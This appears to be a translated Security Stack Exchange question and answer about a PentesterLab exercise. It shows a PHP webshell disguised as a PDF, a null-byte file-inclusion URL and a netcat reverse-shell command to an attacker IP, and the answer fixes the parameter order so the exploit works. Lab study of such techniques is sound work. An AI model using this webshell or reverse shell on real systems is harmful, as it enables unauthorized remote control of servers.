我正在做一个PentesterLab练习,我有一个名为1.pdf的webshell,它可以作为一个PHP包含在index.php中。它包含如下代码:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>现在,我想使用下面的命令使用nc创建一个反向shell,但它不能正常工作:
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash如果我在192.168.117.128输入命令,然后输入,则不会输出任何命令。
虽然,如果我在VM(目标服务器)中直接运行以下命令,它将正确地连接到攻击者:
/bin/nc 192.168.117.128 8001 -e /bin/bash命令的输出在192.168.117.128处得到正确回放。
我想知道为什么netcat在VM中正常工作,而在webshell中却不工作?
感谢任何人的帮助,谢谢。
发布于 2015-01-24 11:52:06
将cmd参数放在利用URL中的空字节注入之前。Null将导致查询字符串提前终止。
https://security.stackexchange.com/questions/55205
复制相似问题